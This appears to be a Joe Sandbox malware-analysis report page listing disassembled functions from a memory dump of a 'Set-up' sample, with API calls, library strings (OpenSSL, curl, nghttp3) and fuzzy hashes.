Instruction ID: 5e042cae9faf7f65d7038213a941d3f9dc1c5caccf821147790c35d566a01148
Opcode Fuzzy Hash: f01811aa040c6f9eb85b77341c80982821ac4b11f8b551712fb6e006ace7ad40
Instruction Fuzzy Hash: A3915634610B029FD7228F34CC99B76BBA5FF86321F194768E8558B2E2E730E844CB50

Function 00540460 Relevance: 12.0, APIs: 5, Strings: 2, Instructions: 1488COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 005406A3

Strings

, xrefs: 005416D8
, xrefs: 00541813

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: memcpy
String ID: $
API String ID: 3510742995-227171996
Opcode ID: ad016c3738c587f0c4f44cab1d53db7355ec12a1c24f7699c96d3f8dd7c0dc7a
Instruction ID: 942bac01d4db65ee339267343b8340a519f188ba9259c54aa5a659e2373f8a57
Opcode Fuzzy Hash: ad016c3738c587f0c4f44cab1d53db7355ec12a1c24f7699c96d3f8dd7c0dc7a
Instruction Fuzzy Hash: E2D29472A087558FC714CF28C8806AAFBE1FFC4318F158A1DE99997391D770E945CB86

Function 004187D0 Relevance: 11.1, APIs: 6, Strings: 1, Instructions: 565COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00418A66
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,?), ref: 00418A88
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000010), ref: 00418B45
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00418B59

Strings

providers/implementations/ciphers/cipher_aes_gcm_siv_hw.c, xrefs: 00418A42, 00418F13

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: memcpymemset
String ID: providers/implementations/ciphers/cipher_aes_gcm_siv_hw.c
API String ID: 1297977491-3184136495
Opcode ID: c0aa7b92e37a55303458682ca12843a97b8d31624310e4df7dd4dfce13479d88
Instruction ID: 702a090c238780d661e7a99eafe4ef612d6fcdae1aea827099f639384ee8d82a
Opcode Fuzzy Hash: c0aa7b92e37a55303458682ca12843a97b8d31624310e4df7dd4dfce13479d88
Instruction Fuzzy Hash: 1522F3719087419FD711CF24C881BABBBE5FF96344F084A1EF89597242EB34E985CB92

Function 00554780 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 446stringCOMMON

Download Yara Rule

APIs

strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002E), ref: 005547A3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 005547C1
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00554800
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00554D16

Strings

H, xrefs: 00554A88
xn--, xrefs: 005549D3

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _strdupmemcpystrchrstrlen
String ID: H$xn--
API String ID: 1602650251-4022323365
Opcode ID: 35c4361637fe97157a5e3cc66b47b057ee7ac6ebc25a40bc3001ce01c2ad4d97
Instruction ID: d63fa08c24539bd69dfa489268efc63ef25ae54a807fdc879e8a0d9161f3bb41
Opcode Fuzzy Hash: 35c4361637fe97157a5e3cc66b47b057ee7ac6ebc25a40bc3001ce01c2ad4d97
Instruction Fuzzy Hash: 2EE12B316087154BD718DE28D8E072ABBE2BBC4319F188A3EDD9687385D774DC898F42

Function 004DC050 Relevance: 10.8, APIs: 3, Strings: 4, Instructions: 304COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 004DC090
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000102), ref: 004DC0BE

Strings

crypto/evp/encode.c, xrefs: 004DC42E
assertion failed: ctx->length <= (int)sizeof(ctx->enc_data), xrefs: 004DC433
0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz./, xrefs: 004DC0D2, 004DC266
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/, xrefs: 004DC0CD, 004DC26B

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: memcpy
String ID: 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz./$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/$assertion failed: ctx->length <= (int)sizeof(ctx->enc_data)$crypto/evp/encode.c
API String ID: 3510742995-2458911571
Opcode ID: 9a2dff49438c6afc89951de20a61650f6e0a9f1a16e72e7ba10bde44b9956a10
Instruction ID: 5178dca46973416eec87c6bbbf26f4c07a53d0604086189e2310f8b01749f979
Opcode Fuzzy Hash: 9a2dff49438c6afc89951de20a61650f6e0a9f1a16e72e7ba10bde44b9956a10
Instruction Fuzzy Hash: 4EC1F97160D3968FC715DF58C4A072ABBE1AF96304F0989AEF8D58B382D239DD05CB52

Function 00332430 Relevance: 8.0, Strings: 4, Instructions: 2966COMMON

Download Yara Rule

Strings

@, xrefs: 00334F5D
@, xrefs: 00334DB4
@, xrefs: 00334EA7
ssl/quic/quic_txp.c, xrefs: 00332A29, 00333096, 00333477, 0033357D, 00333FDE, 00334101

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID:
String ID: @$@$@$ssl/quic/quic_txp.c
API String ID: 0-600063881
Opcode ID: 896d1cf875c8b8b3e40b4a83df58ac1fe04d7ed32fb13f1b627a85a36b4a864f
Instruction ID: a289c7f83e9b4f13f592d924ff710b4619636845eec33d3cb3f991934d21060c
Opcode Fuzzy Hash: 896d1cf875c8b8b3e40b4a83df58ac1fe04d7ed32fb13f1b627a85a36b4a864f
Instruction Fuzzy Hash: 6E53E7716087419FD726CF28C8C1BABB7E5BF85314F15892DE8998B391E731E944CB82

Function 00236210 Relevance: 7.9, Strings: 6, Instructions: 419COMMON

Download Yara Rule

Strings

default, xrefs: 00236471
machine, xrefs: 00236456, 00236656
login, xrefs: 002364FF
netrc.c, xrefs: 00236243, 00236541, 0023655C, 00236609, 00236627, 002366DD, 002366F7, 0023670E, 0023673F, 0023676B
macdef, xrefs: 0023643B
password, xrefs: 002365C6

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID:
String ID: default$login$macdef$machine$netrc.c$password
API String ID: 0-1043775505
Opcode ID: f12d257d56541c757fdfdcfaf8a0bb7073a4159bfb0a474d9a2781aa7d867aa1
Instruction ID: d0d26b7d54833033ab5edda9ebce7f8ee9672055239f8e65253d0930727a2928
Opcode Fuzzy Hash: f12d257d56541c757fdfdcfaf8a0bb7073a4159bfb0a474d9a2781aa7d867aa1
Instruction Fuzzy Hash: 86E138F052C346BBE3118E10D88976BBBDCAF95708F54C42CF98557281E3B9D968CB92

Function 003400F0 Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 404stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,0008000F,00000008,?,003C2212,00000000,00000000), ref: 00340109

Part of subcall function 00387220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/user/eng_list.c,000000EB,user_get_first,00000000,003ABD91), ref: 00387262
Part of subcall function 00387220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/user/eng_list.c,000000EB,user_get_first,00000000,003ABD91), ref: 00387285
Part of subcall function 00387220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/user/eng_list.c,000000EB,user_get_first,00000000,003ABD91), ref: 003872C5
Part of subcall function 00387220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/user/eng_list.c,000000EB,user_get_first,00000000,003ABD91), ref: 003872E8

Strings

a2d_ASN1_OBJECT, xrefs: 00340128, 0034014A, 003405BD
crypto/asn1/a_object.c, xrefs: 0034012F, 00340151, 0034039E, 003403B4, 003405C3, 003405FC, 0034062C
1, xrefs: 00340328

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: strlen$strcpy
String ID: 1$a2d_ASN1_OBJECT$crypto/asn1/a_object.c
API String ID: 2790333442-843477118
Opcode ID: 39319d6881a1a61b2de832a7b971f482bfc938359603928efcf621532dfb078e
Instruction ID: 7284880ed5fef29c08412227e7c512d889b1387aa10470ed672fea04817a87ea
Opcode Fuzzy Hash: 39319d6881a1a61b2de832a7b971f482bfc938359603928efcf621532dfb078e
Instruction Fuzzy Hash: D7E14C35A0C3008BD7269F28D84171EB7E5EF91750F058B2DFAD8AB352E374E9448B82

Function 0027E070 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 436COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((size_t)(p - buf->last) == len,nghttp3_qpack.c,000007B9,?,?,?,?,?,?,?,0027C1CE,?,00000003,?), ref: 0027E4EE

Strings

nghttp3_qpack.c, xrefs: 0027E4E4
(size_t)(p - buf->last) == len, xrefs: 0027E4E9

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: (size_t)(p - buf->last) == len$nghttp3_qpack.c
API String ID: 1222420520-1997541155
Opcode ID: 8b8d3ee209613851253c62824bc6fd151da05c02df3d99a8e72689e486923ff2
Instruction ID: 0c9142b1e8c40ec2270ba19d7dc4b21a6276c8f352816df9f11618f1f0e0fb7f
Opcode Fuzzy Hash: 8b8d3ee209613851253c62824bc6fd151da05c02df3d99a8e72689e486923ff2
Instruction Fuzzy Hash: 4CE11632B142105BDB189E2CC890729B7D7ABD9310F2ACABCE9ADC73D1D635DC588791

Function 0043E5D0 Relevance: 5.1, APIs: 3, Instructions: 1393COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000,00000400), ref: 0043E5F2
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000400), ref: 0043E67F
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000400), ref: 0044003E

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: e1a574964a7f95bfe38d342eb482fab4f598e9d424c0410fc4e889f839482e32
Instruction ID: cb7d237d1ac0df551b6fc56ffef756bd97a54f02fb2172926667922ba7a22423
Opcode Fuzzy Hash: e1a574964a7f95bfe38d342eb482fab4f598e9d424c0410fc4e889f839482e32
Instruction Fuzzy Hash: BED24FAAC39BD541E323A63D68122E6E750AFFB148F51E72BFCD430E52AB2171C44359

Function 005462D0 Relevance: 4.4, Strings: 3, Instructions: 694COMMON

Download Yara Rule

Strings

, xrefs: 0054692B
, xrefs: 005469F8
, xrefs: 00546AA6

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID:
String ID: $ $
API String ID: 0-3665324030
Opcode ID: 44926a9952185c717709522a6c7a105de9636f1a377ff329ad924952f8b001f7
Instruction ID: 88281e67673964853dde9a3be77bff4570f3d2d343891406086e27d4d3924179
Opcode Fuzzy Hash: 44926a9952185c717709522a6c7a105de9636f1a377ff329ad924952f8b001f7
Instruction Fuzzy Hash: 7062F2759083918FC724CF29C4906AAFBE1BFC9314F148A2EE9D993351E734A945CF92

Function 002F24A0 Relevance: 4.1, Strings: 3, Instructions: 385COMMON

Download Yara Rule

Strings

ossl_qrl_enc_level_set_provide_secret, xrefs: 002F251A, 002F259E, 002F2748, 002F27E1
ssl/quic/quic_record_shared.c, xrefs: 002F2524, 002F25A8, 002F2752, 002F27EB
quic hpquic kuossl_qrl_enc_level_set_key_update, xrefs: 002F2680

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID:
String ID: ossl_qrl_enc_level_set_provide_secret$quic hpquic kuossl_qrl_enc_level_set_key_update$ssl/quic/quic_record_shared.c
API String ID: 0-2745174052
Opcode ID: 06176f55d8cde4a80066bfecb7a35284ac2187a8efec3f642d6ffd6a8c11904d
Instruction ID: 0711ef9b49be7af392a509b47b4ef2ce1c1a39e89524e2a2b0bb0342e4b6335c
Opcode Fuzzy Hash: 06176f55d8cde4a80066bfecb7a35284ac2187a8efec3f642d6ffd6a8c11904d
Instruction Fuzzy Hash: 4DD1F67161834ADBE730AF50DC41B6BF7D5BB85784F140838FB895B281E6B1D9288B62

Function 00540560 Relevance: 3.4, APIs: 2, Instructions: 932COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2341935700.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.2341919285.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.0000000000683000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342289685.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342369774.00000000007E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342422257.00000000007E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342437847.00000000007E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342452245.00000000007E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342502633.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000941000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342631026.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342658818.0000000000946000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2342672319.000000000094A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1d0000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51c208cfca86251bae98dd6468be909ada0274f93615980d21852f8ceb528396
Instruction ID: 13dad41f3db4c7cfb9c418de0061245a210b24657d7bd1801e68b1d57297b031
Opcode Fuzzy Hash: 51c208cfca86251bae98dd6468be909ada0274f93615980d21852f8ceb528396
Instruction Fuzzy Hash: 02828172A087558FC724CF28C88469AFBE1FBC4708F158A2DE99997391D770E845CF86

